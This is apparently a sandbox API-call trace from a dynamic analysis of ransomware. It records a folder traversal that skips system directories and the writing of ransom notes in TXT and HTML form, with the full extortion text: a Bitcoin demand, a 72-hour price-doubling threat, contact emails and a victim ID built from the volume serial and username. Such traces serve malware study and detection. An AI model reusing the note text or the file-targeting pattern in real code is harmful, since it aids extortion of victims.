	[0169.971] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="inetcache") returned 0x0
	[0169.971] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.971] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="nvidia") returned 0x0
	[0169.971] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.971] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="packages") returned 0x0
	[0169.971] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.972] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="cookies") returned 0x0
	[0169.972] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.972] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\*.*", lpSrch="programdata") returned 0x0
	[0169.972] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0169.972] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0169.972] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7ed4a7c1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.973] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0169.973] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ed4a7c1, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ed4a7c1, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ed70ce7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0169.973] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7ed242bc, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7ed242bc, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ed4a7c1, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0169.973] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Server", cAlternateFileName="")) returned 1
	[0169.973] lstrcmpW (lpString1="Server", lpString2="..") returned 1
	[0169.973] lstrcmpW (lpString1="Server", lpString2=".") returned 1
	[0169.973] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\DRM" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM") returned="C:\\Users\\All Users\\Microsoft\\DRM"
	[0169.973] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DRM", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\") returned="C:\\Users\\All Users\\Microsoft\\DRM\\"
	[0169.974] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\", lpString2="Server" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned="C:\\Users\\All Users\\Microsoft\\DRM\\Server"
	[0169.974] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\DRM\\Server" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned="C:\\Users\\All Users\\Microsoft\\DRM\\Server"
	[0169.974] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\Server", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\") returned="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\"
	[0169.974] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\") returned="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\"
	[0169.974] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*") returned="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*"
	[0169.974] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0169.975] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*") returned 43
	[0169.975] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0169.975] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*", cchLength=0x2b | out: lpsz="c:\\users\\all users\\microsoft\\drm\\server\\*.*") returned 0x2b
	[0169.975] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.975] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="windows") returned 0x0
	[0169.976] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.976] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="boot") returned 0x0
	[0169.976] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.976] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="system volume information") returned 0x0
	[0169.976] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.976] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0169.977] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.977] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="temp") returned 0x0
	[0169.977] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.977] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="program files") returned 0x0
	[0169.977] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.977] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="program files (x86)") returned 0x0
	[0169.977] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.978] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="appdata") returned 0x0
	[0169.990] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.990] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="application data") returned 0x0
	[0169.990] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.991] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="winnt") returned 0x0
	[0169.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.991] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="tmp") returned 0x0
	[0169.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.991] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="cache") returned 0x0
	[0169.991] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.992] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="temporary internet files") returned 0x0
	[0169.992] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.992] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="webcache") returned 0x0
	[0169.992] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.992] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="inetcache") returned 0x0
	[0169.992] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.993] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="nvidia") returned 0x0
	[0169.993] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.993] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="packages") returned 0x0
	[0169.993] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.993] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="cookies") returned 0x0
	[0169.995] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.995] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="programdata") returned 0x0
	[0169.995] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.995] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0169.995] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0169.996] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0169.996] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\DRM\\Server" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\Server") returned="C:\\Users\\All Users\\Microsoft\\DRM\\Server"
	[0169.996] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\Server", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*") returned="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*"
	[0169.996] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.997] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.997] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\HELP_DECRYPT_YOUR_FILES.TXT") returned 67
	[0169.997] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.998] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0169.998] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0170.001] CloseHandle (hObject=0x388) returned 1
	[0170.001] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.002] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.002] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0170.003] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0170.004] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.004] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0170.004] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0170.004] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0170.004] CloseHandle (hObject=0x388) returned 1
	[0170.005] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0170.006] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0170.006] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0170.006] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\HELP_DECRYPT_YOUR_FILES.HTML") returned 68
	[0170.006] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.007] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0170.007] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0170.011] CloseHandle (hObject=0x388) returned 1
	[0170.011] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.012] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.012] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.013] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0170.014] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.014] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.014] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0170.014] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.015] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0170.015] CloseHandle (hObject=0x388) returned 1
	[0170.015] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*" (normalized: "c:\\users\\all users\\microsoft\\drm\\server\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7edbcf55, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0170.016] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*") returned 43
	[0170.016] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.016] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\DRM\\Server\\*.*", cchLength=0x2b | out: lpsz="c:\\users\\all users\\microsoft\\drm\\server\\*.*") returned 0x2b
	[0170.016] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.016] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="windows") returned 0x0
	[0170.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.017] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="boot") returned 0x0
	[0170.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.017] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="system volume information") returned 0x0
	[0170.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.017] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.017] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.018] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="temp") returned 0x0
	[0170.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.018] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="program files") returned 0x0
	[0170.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.018] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.018] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="appdata") returned 0x0
	[0170.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="application data") returned 0x0
	[0170.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.019] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="winnt") returned 0x0
	[0170.019] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="tmp") returned 0x0
	[0170.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="cache") returned 0x0
	[0170.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.020] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.020] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="webcache") returned 0x0
	[0170.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="inetcache") returned 0x0
	[0170.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="nvidia") returned 0x0
	[0170.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.021] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="packages") returned 0x0
	[0170.021] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.022] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="cookies") returned 0x0
	[0170.022] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.022] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\drm\\server\\*.*", lpSrch="programdata") returned 0x0
	[0170.022] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0170.022] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0170.022] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7edbcf55, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.022] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0170.023] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7edbcf55, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7edbcf55, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ede3138, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0170.023] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7edbcf55, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7edbcf55, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7edbcf55, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
